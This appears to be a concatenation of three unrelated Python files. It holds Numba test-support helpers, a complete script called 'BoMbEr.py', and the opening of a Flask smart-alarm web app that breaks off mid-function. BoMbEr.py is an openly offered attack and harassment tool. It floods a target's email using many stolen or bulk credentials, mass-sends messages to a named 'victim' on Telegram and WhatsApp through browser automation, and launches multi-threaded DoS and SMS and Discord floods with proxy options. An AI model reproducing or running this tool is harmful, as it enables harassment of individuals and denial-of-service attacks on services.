avoid issues due to Python's internal directory caching.
"""
import importlib
importlib.invalidate_caches()
__import__(modname)
return sys.modules[modname]
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, io.StringIO())
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\n")
"""
return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\n")
"""
return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
with captured_stdout() as out:
with override_config('DEBUG_CACHE', True):
yield out
class MemoryLeak(object):
__enable_leak_check = True
def memory_leak_setup(self):
# Clean up any NRT-backed objects hanging in a dead reference cycle
gc.collect()
self.__init_stats = rtsys.get_allocation_stats()
def memory_leak_teardown(self):
if self.__enable_leak_check:
self.assert_no_memory_leak()
def assert_no_memory_leak(self):
old = self.__init_stats
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free)
self.assertEqual(total_mi_alloc, total_mi_free)
def disable_leak_check(self):
# For per-test use when MemoryLeakMixin is injected into a TestCase
self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
def setUp(self):
super(MemoryLeakMixin, self).setUp()
self.memory_leak_setup()
def tearDown(self):
super(MemoryLeakMixin, self).tearDown()
gc.collect()
self.memory_leak_teardown()
@contextlib.contextmanager
def forbid_codegen():
"""
Forbid LLVM code generation during the execution of the context
manager's enclosed block.
If code generation is invoked, a RuntimeError is raised.
"""
from numba.core import codegen
patchpoints = ['CodeLibrary._finalize_final_module']
old = {}
def fail(*args, **kwargs):
raise RuntimeError("codegen forbidden by test case")
try:
# XXX use the mock library instead?
for name in patchpoints:
parts = name.split('.')
obj = codegen
for attrname in parts[:-1]:
obj = getattr(obj, attrname)
attrname = parts[-1]
value = getattr(obj, attrname)
assert callable(value), ("%r should be callable" % name)
old[obj, attrname] = value
setattr(obj, attrname, fail)
yield
finally:
for (obj, attrname), value in old.items():
setattr(obj, attrname, value)
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
"""
Temporarily redirect *fd* to a pipe's write end and return a file object
wrapping the pipe's read end.
"""
from numba import _helperlib
libnumba = ctypes.CDLL(_helperlib.__file__)
libnumba._numba_flush_stdout()
save = os.dup(fd)
r, w = os.pipe()
try:
os.dup2(w, fd)
yield io.open(r, "r")
finally:
libnumba._numba_flush_stdout()
os.close(w)
os.dup2(save, fd)
os.close(save)
def redirect_c_stdout():
"""Redirect C stdout
"""
fd = sys.__stdout__.fileno()
return redirect_fd(fd)
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
"""Spawn a new process to run `func` with a temporary cache directory.
The childprocess's stdout and stderr will be captured and redirected to
the current process's stdout and stderr.
Returns
-------
ret : dict
exitcode: 0 for success. 1 for exception-raised.
stdout: str
stderr: str
"""
cache_dir = temp_directory(cache_dir_prefix)
return run_in_new_process_in_cache_dir(func, cache_dir, verbose=verbose)
def run_in_new_process_in_cache_dir(func, cache_dir, verbose=True):
"""Spawn a new process to run `func` with a temporary cache directory.
The childprocess's stdout and stderr will be captured and redirected to
the current process's stdout and stderr.
Similar to ``run_in_new_process_caching()`` but the ``cache_dir`` is a
directory path instead of a name prefix for the directory path.
Returns
-------
ret : dict
exitcode: 0 for success. 1 for exception-raised.
stdout: str
stderr: str
"""
ctx = mp.get_context('spawn')
qout = ctx.Queue()
with override_env_config('NUMBA_CACHE_DIR', cache_dir):
proc = ctx.Process(target=_remote_runner, args=[func, qout])
proc.start()
proc.join()
stdout = qout.get_nowait()
stderr = qout.get_nowait()
if verbose and stdout.strip():
print()
print('STDOUT'.center(80, '-'))
print(stdout)
if verbose and stderr.strip():
print(file=sys.stderr)
print('STDERR'.center(80, '-'), file=sys.stderr)
print(stderr, file=sys.stderr)
return {
'exitcode': proc.exitcode,
'stdout': stdout,
'stderr': stderr,
}
def _remote_runner(fn, qout):
"""Used by `run_in_new_process_caching()`
"""
with captured_stderr() as stderr:
with captured_stdout() as stdout:
try:
fn()
except Exception:
traceback.print_exc()
exitcode = 1
else:
exitcode = 0
qout.put(stdout.getvalue())
qout.put(stderr.getvalue())
sys.exit(exitcode)
class CheckWarningsMixin(object):
@contextlib.contextmanager
def check_warnings(self, messages, category=RuntimeWarning):
with warnings.catch_warnings(record=True) as catch:
warnings.simplefilter("always")
yield
found = 0
for w in catch:
for m in messages:
if m in str(w.message):
self.assertEqual(w.category, category)
found += 1
self.assertEqual(found, len(messages))
|
BoMbEr.py | # -*- coding: utf-8 -*-
#!/usr/bin/env python
"""
╔═════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ BoMbEr ║
║ Author: ║
║ https://github.com/ebankoff ║
║ ║
║ The author of this program is not responsible for its use! ║
║ When posting this code on other resources, please indicate the author! ║
║ ║
║ All rights reserved. ║
║ Copyright (C) 2021 ebankoff ║
║ ║
╚═════════════════════════════════════════════════════════════════════════════════╝
"""
#--------------------------------------(main)--------------------------------------
import os
import sys
import time
import json
import emoji
import random
import shutil
import socket
import ctypes
import smtplib
import os.path
import asyncio
import requests
import colorama
import datetime
import threading
import user_agent
import progressbar
from sms import sms
from dos import dos
from time import sleep
from threading import *
from sys import platform
from asyncio import sleep
from getpass import getpass
from os import name, system
from discord import discord
from progress.bar import Bar
from threading import Thread
from functools import reduce
from bs4 import BeautifulSoup
from requests import get, post
from selenium import webdriver
from os.path import exists, isfile
from random import choice, randint
from bs4 import BeautifulSoup as bs
from selenium_stealth import stealth
from progress.spinner import Spinner
from selenium.webdriver.common.by import By
from colorama import Fore, Back, Style, init
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import StaleElementReferenceException
colorama.init()
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
def pb():
spinner = Spinner(Fore.YELLOW + Style.BRIGHT + 'Processing ', max=20)
for i in range(20):
time.sleep(.12)
spinner.next()
spinner.finish()
def check_internet():
try:
pb()
get("http://google.com", timeout=1)
print("\033[32m{}" .format('''
╔════════╗
║Success!║
╚════════╝'''))
except Exception:
print("\033[31m{}" .format('''
╔═══════════════════════╗
║No internet connection!║
╚═══════════════════════╝
'''))
input()
ex()
def ex():
param=input('Exit? yes/no: ')
if param == 'yes':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print("\033[36m{}" .format('''
Thanks for using BoMbEr!
I would be grateful if you star on this repository on GitHub:
https://github.com/ebankoff/BoMbEr
You can support me by sending any amount to my Qiwi:
qiwi.com/n/HERAMANT
Copyright (C) 2021 ebankoff
'''))
print("Press Enter to exit")
input()
os.abort()
elif param == 'no':
main()
else:
print('ERROR: invalid value')
ex()
def email(emails, passwords, to, amount, subj, mes, server):
if server == '1':
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
elif server == '2':
server = smtplib.SMTP('smtp.mail.yahoo.com', 465)
server.starttls()
elif server == '3':
server = smtplib.SMTP('smtp-mail.outlook.com', 587)
server.starttls()
elif server == '4':
server = smtplib.SMTP('smtp.yandex.ru', 465)
server.starttls()
server.login(emails, passwords)
for i in range(amount):
server.sendmail(emails, to, subj, mes)
def telega(name, count, msg, cn):
try:
driver = webdriver.Chrome(ChromeDriverManager().install())
driver.get("https://web.telegram.org/k")
time.sleep(35)
search = driver.find_element(By.XPATH, "//*[@id='column-left']/div/div/div[1]/div[2]/input")
search.send_keys(name, Keys.RETURN)
time.sleep(8)
search2 = driver.find_element(By.XPATH, "//*[@id='search-container']/div[2]/div/div/div[1]/div/div[1]/ul")
driver.implicitly_wait(10)
ActionChains(driver).move_to_element(search2).click(search2).perform()
time.sleep(15)
msgBox = driver.find_element(By.XPATH,"//*[@id='column-center']/div/div/div[4]/div/div[1]/div[7]/div[1]/div[1]")
for i in range(count):
msgBox.send_keys(msg, Keys.RETURN)
cn+=1
print("\033[34m{}" .format(now.strftime('%Y-%m-%d / %H:%M:%S')) + "\033[37m {}" .format('|') + "\033[32m {}" .format(f'ATTACK') + "\033[37m {}" .format('|') + "\033[36m {}" .format(cn) + "\033[37m {}" .format('|') + "\033[35m {}" .format(name))
print("\033[32m {}" .format("Successful!"))
print(f"{cn} messages were sent to {name}")
ex()
except:
print("\033[31m{}" .format('ERROR!'))
ex()
def whatsapp(name, count, msg, cn):
driver = webdriver.Chrome(ChromeDriverManager().install())
driver.get("https://web.whatsapp.com")
time.sleep(15)
search = driver.find_element(By.XPATH, "//*[@id='side']/div[1]/div/label/div/div[2]")
search.send_keys(name, Keys.RETURN)
time.sleep(15)
msgBox = driver.find_element(By.XPATH,"//*[@id='main']/footer/div[1]/div/span[2]/div/div[2]/div[1]/div/div[2]")
for i in range(count):
try:
msgBox.send_keys(msg, Keys.RETURN)
cn+=1
print("\033[34m{}" .format(now.strftime('%Y-%m-%d / %H:%M:%S')) + "\033[37m {}" .format('|') + "\033[32m {}" .format(f'SUCCESS') + "\033[37m {}" .format('|') + "\033[36m {}" .format(cn) + "\033[37m {}" .format('|') + "\033[35m {}" .format(name))
except:
cn+=1
print("\033[34m{}" .format(now.strftime('%Y-%m-%d / %H:%M:%S')) + "\033[37m {}" .format('|') + "\033[31m {}" .format(f'FAILED') + "\033[37m {}" .format('|') + "\033[36m {}" .format(cn) + "\033[37m {}" .format('|') + "\033[35m {}" .format(name))
def main():
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT + '''╔══╗ ╔═╗╔═╦╗ ╔═══╗
║╔╗║ ║ ╚╝ ║║ ║╔══╝
║╚╝╚╦══╣╔╗╔╗║╚═╣╚══╦═╗
║╔═╗║╔╗║║║║║║╔╗║╔══╣╔╝
║╚═╝║╚╝║║║║║║╚╝║╚══╣║
╚═══╩══╩╝╚╝╚╩══╩═══╩╝
''')
print("\033[0m" + Fore.CYAN + "================================================")
print(Fore.YELLOW + "Created by Eban'ko - https://github.com/ebankoff")
print(Fore.CYAN + "================================================")
print('''
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m0\033[0m\033[40m\033[35m]\033[31m Exit
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m1\033[0m\033[40m\033[35m] Email bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m2\033[0m\033[40m\033[35m] SMS bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m3\033[0m\033[40m\033[35m] Telegram bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m4\033[0m\033[40m\033[35m] DoS bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m5\033[0m\033[40m\033[35m] WhatsApp bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m6\033[0m\033[40m\033[35m] Discord bomber
\033[0m\033[40m\033[35m[\033[0m\033[40m\033[32m7\033[0m\033[40m\033[35m]\033[36m Clear program cache
''')
try:
ans = input('\033[0m\033[40m\033[35m → \033[36m')
if ans == '0':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
ex()
elif ans == '1':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT +'''
╔═══╦═╗╔═╦═══╦══╦╗
║╔══╣ ╚╝ ║╔═╗╠╣╠╣║
║╚══╣╔╗╔╗║║ ║║║║║║
║╔══╣║║║║║╚═╝║║║║║ ╔╗
║╚══╣║║║║║╔═╗╠╣╠╣╚═╝║
╚═══╩╝╚╝╚╩╝ ╚╩══╩═══╝
''')
emails = []
passwords = []
to = str(input(Fore.YELLOW + Style.BRIGHT +'Enter target email:\033[36m '))
amount = int(input(Fore.YELLOW + Style.BRIGHT +'How many send from every address:\033[36m '))
subj = str(input(Fore.YELLOW + Style.BRIGHT +'Enter subject:\033[36m '))
mes = str(input(Fore.YELLOW + Style.BRIGHT +'Enter message:\033[36m '))
server = input(Fore.YELLOW + Style.BRIGHT +'Select emails server - 1:Gmail 2:Yahoo 3:Outlook 4:Yandex:\033[36m ')
ans4 = ""
ans5 = ""
with open(r"emails.txt", "r", encoding="utf-8") as file:
for line in file:
pos = line.find(':')
ans4 += line[:pos]
emails.append(ans4)
ans4 = ""
with open(r"emails.txt", "r", encoding="utf-8") as file:
for line in file:
pos = line.find(':')
ans5 += line[pos + 1:]
passwords.append(ans5)
ans5 = ""
emails = [line.rstrip() for line in emails]
passwords = [line.rstrip() for line in passwords]
for i in range(len(emails)):
th = Thread(target=email, args=(emails[i], passwords[i], to, amount, subj, mes, server,))
th.start()
print(Fore.GREEN + "Attacking...")
th.join()
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '2':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT +'''
╔═══╦═╗╔═╦═══╗
║╔═╗║ ╚╝ ║╔═╗║
║╚══╣╔╗╔╗║╚══╗
╚══╗║║║║║╠══╗║
║╚═╝║║║║║║╚═╝║
╚═══╩╝╚╝╚╩═══╝
''')
prx = input(Fore.YELLOW + Style.BRIGHT + "Proxy? yes/no:\033[36m ").lower()
code = input(Fore.YELLOW + Style.BRIGHT + "Target country code: \033[36m+")
number = code + input(Fore.YELLOW + Style.BRIGHT + f"Target number: \033[36m{code}")
tm = int(input(Fore.YELLOW + Style.BRIGHT + "Time attack(in seconds):\033[36m "))
thr = int(input(Fore.YELLOW + Style.BRIGHT + "Number of threads:\033[36m "))
for i in range(thr):
th = Thread(target=sms, args=(prx, number, tm,))
th.start()
print(f"\033[35m[\033[36m{str(i + 1)}\033[35m]" + Fore.CYAN + " thread started")
print(Fore.GREEN + "\nAttacking...")
th.join()
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '3':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT +'''
╔════╗ ╔╗
║╔╗╔╗║ ║║
╚╝║║╠╩═╣║╔══╦══╦═╦══╦╗╔╗
║║║ ═╣║║ ═╣╔╗║╔╣╔╗║╚╝║
║║║ ═╣╚╣ ═╣╚╝║║║╔╗║║║║
╚╝╚══╩═╩══╩═╗╠╝╚╝╚╩╩╩╝
╔═╝║
╚══╝
''')
name = input(Fore.YELLOW + Style.BRIGHT + "Victim name:\033[36m ")
count = int(input(Fore.YELLOW + Style.BRIGHT + "Number of messages:\033[36m "))
msg = input(Fore.YELLOW + Style.BRIGHT + "Message:\033[36m ")
cn = 0
print("")
print(Fore.YELLOW + Style.BRIGHT + "YOU HAVE 35 SECONDS TO LOG IN!")
input(Fore.YELLOW + Style.BRIGHT + "Press Enter to start")
telega(name, count, msg, cn)
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '4':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT + '''
╔═══╗ ╔═══╗
╚╗╔╗║ ║╔═╗║
║║║╠══╣╚══╗
║║║║╔╗╠══╗║
╔╝╚╝║╚╝║╚═╝║
╚═══╩══╩═══╝
''')
prx = input(Fore.YELLOW + Style.BRIGHT + "Proxy? yes/no:\033[36m ").lower()
url = input(Fore.YELLOW + Style.BRIGHT + "URL:\033[36m ")
tm = int(input(Fore.YELLOW + Style.BRIGHT + "Attack time in seconds:\033[36m "))
threads = int(input(Fore.YELLOW + Style.BRIGHT + "Threads:\033[36m "))
for i in range(threads):
th = threading.Thread(target=dos, args=(url, tm, prx,))
th.start()
print(f"\033[35m[\033[36m{str(i + 1)}\033[35m]" + Fore.CYAN + " thread started")
th.join()
time.sleep(4)
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '5':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT +'''
╔╗╔╗╔╦╗ ╔╗ ╔═══╗
║║║║║║║ ╔╝╚╗ ║╔═╗║
║║║║║║╚═╦═╩╗╔╬══╣║ ║╠══╦══╗
║╚╝╚╝║╔╗║╔╗║║║══╣╚═╝║╔╗║╔╗║
╚╗╔╗╔╣║║║╔╗║╚╬══║╔═╗║╚╝║╚╝║
╚╝╚╝╚╝╚╩╝╚╩═╩══╩╝ ╚╣╔═╣╔═╝
║║ ║║
╚╝ ╚╝
''')
name = input(Fore.YELLOW + Style.BRIGHT + "Victim name:\033[36m ")
count = int(input(Fore.YELLOW + Style.BRIGHT + "Number of messages:\033[36m "))
msg = input(Fore.YELLOW + Style.BRIGHT + "Message:\033[36m ")
cn=0
print("")
print(Fore.YELLOW + Style.BRIGHT + "YOU HAVE 15 SECONDS TO LOG IN!")
input(Fore.YELLOW + Style.BRIGHT + "Press Enter to start")
whatsapp(name, count, msg, cn)
print("")
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '6':
if platform == 'win32':
os.system("cls")
else:
os.system("clear")
print(Fore.YELLOW + Style.BRIGHT +'''
╔═══╗ ╔╗
╚╗╔╗║ ║║
║║║╠╦══╦══╦══╦═╦═╝║
║║║╠╣══╣╔═╣╔╗║╔╣╔╗║
╔╝╚╝║╠══║╚═╣╚╝║║║╚╝║
╚═══╩╩══╩══╩══╩╝╚══╝
''')
prx = input(Fore.YELLOW + Style.BRIGHT + "Proxy? yes/no:\033[36m ").lower()
idd = input(Fore.YELLOW + Style.BRIGHT + "Target ID:\033[36m ")
tkn = input(Fore.YELLOW + Style.BRIGHT + "Account token:\033[36m ")
cnt = int(input(Fore.YELLOW + Style.BRIGHT + "Number of messages:\033[36m "))
msg = input(Fore.YELLOW + Style.BRIGHT + "Message:\033[36m ")
print("")
input(Fore.YELLOW + Style.BRIGHT + "Press Enter to start")
discord(tkn, idd, msg, cnt, prx)
print("")
print(Fore.GREEN + '''
===============================
SUCCESS
===============================
''')
ex()
elif ans == '7':
shutil.rmtree('__pycache__')
print("SUCCESS!")
ex()
else:
print(Fore.RED + 'ERROR!')
ex()
except:
print(Fore.RED + 'ERROR!')
ex()
if __name__=='__main__':
if platform == 'win32':
ctypes.windll.kernel32.SetConsoleTitleW("BoMbEr")
pb()
main()
|
smart_alarm.py | """
This module is a program that simulates a Smart Alarm as a Web Sever.
"""
import os
from datetime import datetime, timedelta
import calendar
import sched
import time
import json
import threading
import logging.config
import pyttsx3
import requests
from flask import Flask, render_template, request, redirect, url_for,\
flash
alarms = []
notifications = []
scheduler = sched.scheduler(time.time, time.sleep)
app = Flask(__name__)
# checks if the 'log' directory exists
try:
os.mkdir("log")
except:
print("")
logging.config.fileConfig('logging.conf',
disable_existing_loggers=False)
# creating logger
errorLogger = logging.getLogger('smartAlarmLogs')
eventLogger = logging.getLogger('smartAlarmEventsLog')
logging.info("STARTED LOG")
def save_to_log(array: list) -> list:
"""
Only save certain elements to the event log. Such as the date_time,
event name and event period.
:param array: a list where certain data is collected from.
:return new_array: contains a json formatted list.
"""
new_array = []
for col in array:
temp = []
for row in range(3):
temp.append(col[row])
# stores to new_array as json format
new_array.append({"date_time": temp[0], "event_name": temp[1],
"event_period": temp[2]})
return new_array
def get_last_line(fname: str):
"""
This gets the last late in a file.
:param fname: a string informing the file name.
:return:
"""
errorLogger.debug("GET LAST LINE: %s", fname)
# check if the file exists
try:
file = open(fname, 'r')
except IOError:
errorLogger.error("Failed to to read log file %s", fname)
return None
else:
with file:
lines = file.read().splitlines()
if lines:
# last line in the file
return lines[-1]
return None
def restore_from_log():
"""
This retrieve the information from log file as json format.
:return:
"""
errorLogger.debug("RESTORE FROM LOG")
log_file_name = get_config("sys_log_file")
last_line = get_last_line(log_file_name)
# check if the log file is empty
if last_line:
# using '@' as a key to split the string
split_data = last_line.split("@")
if len(split_data) <= 1:
errorLogger.error("Event(s) has not found in the system "
"log: %s", last_line)
return
events_line = split_data[1].replace("\'", "\"")
# converts it to json format
events = json.loads(events_line)
# recovering data from the log file and assigning it to the
# alarm.
for element in events:
date_time = element["date_time"]
date_time_obj = datetime.strptime(date_time, "%d/%m/%Y "
"%H:%M")
event_name = element["event_name"]
event_period = element["event_period"]
# check the event isn't expired
if event_period != "Once" or date_time_obj >= \
datetime.now():
errorLogger.info("Restoring Alarm Notification "
"Schedule(s)")
time_delay = time_difference(date_time_obj)
event_sched = scheduler.enter(
time_delay, 1, set_notification,
argument=(date_time, event_name, event_period))
alarms.append([date_time, event_name, event_period,
event_sched])
errorLogger.info("Alarm of Event %s has been Restored"
" successfully.", event_name)
else:
errorLogger.warning("Alarm of Event %s has expired due"
" to only being repeated once.",
event_name)
else:
errorLogger.warning("System log is empty")
def get_event(event_name: str) -> list:
"""
This retrieve the element in the list alarms by the event_name.
:param event_name: a string that is unique, which has been set by
the user.
:return element: a list of the element in the array ALARMS.
:return []: an empty list.
"""
errorLogger.debug("GET EVENT: %s", event_name)
for element in alarms:
if element[1] == event_name:
return element
return []
def time_difference(date_time: datetime) -> int:
"""
Calculate the time difference between the alarm time and the
current time in seconds.
:param date_time: a datetime used to calculate the time difference.
:return remaining_time: an integer representing the remaining time.
"""
errorLogger.debug("TIME DIFFERENT: %s", date_time)
# calculating the time different in seconds
remaining_time = (date_time - datetime.now()).total_seconds()
errorLogger.debug("Remaining Time from NOW: %d",
int(remaining_time))
# returning the time different in seconds as a whole number
return int(remaining_time)
def add_one_month(date_time: datetime) -> datetime:
"""
Adding one month to a datetime.
:param date_time: a datetime used to add one month to it.
:return date_time.replace(year, month, day): a datetime with one
month added.
"""
errorLogger.debug("ADD ONE MONTH: %s", date_time)
new_year = date_time.year
new_month = date_time.month + 1
# check if the month is valid
if new_month > 12:
new_year += 1
new_month -= 12
last_day_of_month = calendar.monthrange(new_year, new_month)[1]
new_day = min(date_time.day, last_day_of_month)
return date_time.replace(year=new_year, month=new_month,
day=new_day)
def add_days(event_period: str, date_time: str) -> datetime:
"""
Adding days depending on alarm repeats set by the user.
:param event_period: a string informing how often the repeat needs
to be.
:param date_time: a datetime containing the date-time, which needed
to be repeated.
:return: a datetime with added days for repeats.
"""
errorLogger.debug("ADD DAYS: %s, %s", event_period, date_time)
date_time = datetime.strptime(date_time, "%d/%m/%Y %H:%M")
if event_period == "Everyday":
# add 1 day
return date_time + timedelta(days=1)
elif event_period == "Every Week":
# add 1 week
return date_time + timedelta(weeks=1)
elif event_period == "Every Month":
# add 1 month
return add_one_month(date_time)
elif event_period == "Every Year":
# add 1 year
return date_time.replace(year=date_time.year + 1)
def reschedule(date_time: str, event_name: str, event_period: str):
"""
Checks whether or not the alarm needs to be rescheduled.
:param date_time: a datetime containing the date and time set by
the user.
:param event_name: a string representing the event name.
:param event_period: a string representing the frequency of the
alarm.
"""
errorLogger.debug("RESCHEDULE: %s, %s, %s", date_time, event_name,
event_period)
event = get_event(event_name)
if event:
# checking weather or not the event needs to be rescheduled
if event_period == "Once":
alarms.remove(event)
else:
alarms.remove(event)
new_date_time = add_days(event_period, date_time)
temp_delay = time_difference(new_date_time)
errorLogger.info("Add new schedule event")
# rescheduling
event_sched = scheduler.enter(
temp_delay, 1, set_notification,
argument=(str(new_date_time.strftime("%d/%m/%Y %H:%M")),
event_name, event_period))
alarms.append([str(new_date_time.strftime("%d/%m/%Y %H:%M")),
event_name, event_period, event_sched])
def set_notification(date_time: str, event_name: str, event_period: str):
"""
This inform the user that the alarm has went off by setting a
notification.
:param date_time: a datetime containing the date and time set by
the user.
:param event_name: a string representing the event name.
:param event_period: a string representing the frequency of the
alarm.
"""
errorLogger.debug("SET NOTIFICATION: %s, %s, %s", date_time,
event_name, event_period)
try:
# text-to-speech
errorLogger.info("Alarm! Alarm! Alarm!")
engine = pyttsx3.init()
engine.say("Alarm! Alarm! Alarm!")
engine.say("An alarm for " + event_name)
engine.say("at " + date_time)
engine.runAndWait()
engine.stop()
except:
errorLogger.error("pyttsx3 only supports Windows environment")
notifications.append([date_time, event_name, event_period])
reschedule(date_time, event_name, event_period)
def scheduler_event():
"""
Starts the scheduler thread, which will run parallel to flask.
"""
errorLogger.debug("SCHEDULER EVENT")
errorLogger.info("Start alarm scheduler events")
while True:
try:
# prevents the program from getting blocked and waiting there.
scheduler.run(blocking=False)
time.sleep(0.1)
except:
errorLogger.error("Error in scheduler Thread")
def weather_api() -> json:
"""
This retrieve the weather api as a json format.
:return weather: a json file to be accessed in the html.
"""
errorLogger.debug("WEATHER API")
errorLogger.info("Getting Weather Data by URL")
# weather api url
weather_url = "http://api.openweathermap.org/data/2.5/weather?q=" \
"{}&units=metric&appid="
weather_url += get_config("weather")
city = "Exeter"
# gets the weather api as json format
weather_request = requests.get(weather_url.format(city)).json()
# storing the variable 'weather' as json
weather = {
"city": city,
"temperature": weather_request["main"]["temp"],
"description": weather_request["weather"][0]["description"],
"icon": weather_request["weather"][0]["icon"],
}
return weather
def news_api() -> json:
"""
This retrieve the news api as a json format.
:return news: a json file to be accessed in the html.
"""
errorLogger.debug("NEWS API")
errorLogger.info("Getting News Data by URL")
# news api url
news_url = "https://newsapi.org/v2/top-headlines?sources=" \
"bbc-news&apiKey="
news_url += get_config("news")
# gets the news api as json format
news_request = requests.get(news_url).json()
# storing the variable 'news' as json
news = {
"url": news_request["articles"][0]["url"],
"image": news_request["articles"][0]["urlToImage"],
"title": news_request["articles"][0]["title"],
"description": news_request["articles"][0]["description"],
"date": news_request["articles"][0]["publishedAt"],
}
return news
def get_config(name: str):
"""
Gets the information in the config file.
:param name: a string used to search for the value representing
it.
"""
errorLogger.debug("GET CONFIG: %s", name)
# openning the config.json file
try:
config_file = open('config.json')
except IOError:
errorLogger.error("Failed to read config file %s", name)
return None
else:
with config_file:
# storing it to a variable
data = json.load(config_file)
if name == "weather":
return data["weather_api_key"]
elif name == "news":
return data["news_api_key"]
else:
return data[name]
@app.route('/', methods=['GET'])
def root() -> redirect:
"""
This function will run at the localhost when it is being started
up.
:return: redirect to the home method.
"""
errorLogger.debug("ROOT")
return redirect(url_for('home'))
@app.route('/home', methods=['GET'])
def home() -> render_template:
"""
Initialise the home page for the web sever.
:return:
"""
errorLogger.debug("HOME")
weather = weather_api()
news = news_api()
# sorted depending on time
alarms.sort(key=lambda x: datetime.strptime(x[0],
'%d/%m/%Y %H:%M'))
errorLogger.info("Alarms list has been sorted by date time")
errorLogger.debug(alarms)
return render_template(get_config("home_page"), weather=weather,
news=news, ALARMS=alarms,
NOTIFICATIONS=notifications)
@app.route('/addAlarm', methods=['POST'])
def add_alarm() -> redirect:
"""
Adding alarm to the alarms list, which was set by the user.
:return:
"""
errorLogger.debug("ADDING ALARM")
date_time = request.form.get("date").replace('T', ' ')
date_time = datetime.strptime(date_time, "%Y-%m-%d %H:%M")
event_name = request.form.get("event_name")
event_period = request.form.get("event_period")
errorLogger.debug("ADDING ALARM: date_time: %s, event_name: %s, "
"event_period: %s", date_time, event_name,
event_period)
# validating that the alarm is set to a future date.
if date_time <= datetime.now():
flash("Alarm of Event " + event_name + " at "
+ str(date_time.strftime("%d/%m/%Y %H:%M"))
+ " is in past!", 'error')
errorLogger.warning("Alarm of Event %s at %s is in past.",
event_name,
str(date_time.strftime("%d/%m/%Y %H:%M")))
return redirect(url_for('home'))
alarm = get_event(event_name)
if not alarm:
errorLogger.info("Create Schedule for an event %s", event_name)
time_delay = time_difference(date_time)
event_sched = scheduler.enter(
time_delay, 1, set_notification,
argument=(str(date_time.strftime("%d/%m/%Y %H:%M")),
event_name, event_period))
alarms.append([str(date_time.strftime("%d/%m/%Y %H:%M")),
event_name, event_period, event_sched])
# Save alarms list into system log
eventLogger.critical("Alarms list : @%s", save_to_log(alarms))
errorLogger.info("Event change has been captured and recorded"
" into"
" system log for CREATE action.")
flash("Alarm of Event " + event_name + " has been Created "
"successfully",
'success')
errorLogger.info("Alarm of Event %s has been Created "
"successfully.", event_name)
else:
flash("Alarm of Event " + event_name + " already exists",
'error')
errorLogger.warning("Alarm of Event %s already exists.",
event_name)
return redirect(url_for('home'))
@app.route('/editAlarm', methods=['POST'])
def edit_alarm() -> render_template:
"""
Editing alarm.
:return:
"""
errorLogger.debug("EDITING ALARM")
weather = weather_api()
news = news_api()
temp_date = request.form.get("date")
temp_date = datetime.strptime(temp_date, "%d/%m/%Y %H:%M")
temp_date = str(temp_date.strftime("%Y-%m-%dT%H:%M"))
temp_event_name = request.form.get("event_name")
temp_event_period = request.form.get("event_period")
errorLogger.debug("EDITING ALARM (Before): date_time:%s, "
"event_name:%s, event_period:%s", temp_date,
temp_event_name, temp_event_period)
return render_template(get_config("edit_page"), weather=weather,
news=news, event_period=temp_event_period,
alarm=temp_date, event_name=temp_event_name)
@app.route('/updateAlarm/<string:event_id>', methods=['POST'])
def update_alarm(event_id: str) -> redirect:
"""
Updating alarm.
:param event_id: a string to indicate the id of the event.
:return:
"""
errorLogger.debug("UPDATING ALARM")
temp_alarm = []
event_name = request.form.get("event_name")
date_time = request.form.get("date").replace('T', ' ')
date_time = datetime.strptime(date_time, "%Y-%m-%d %H:%M")
event_period = request.form.get("event_period")
errorLogger.debug("UPDATING ALARM (After): date_time:%s, "
"event_name:%s, event_period:%s", date_time,
event_name, event_period)
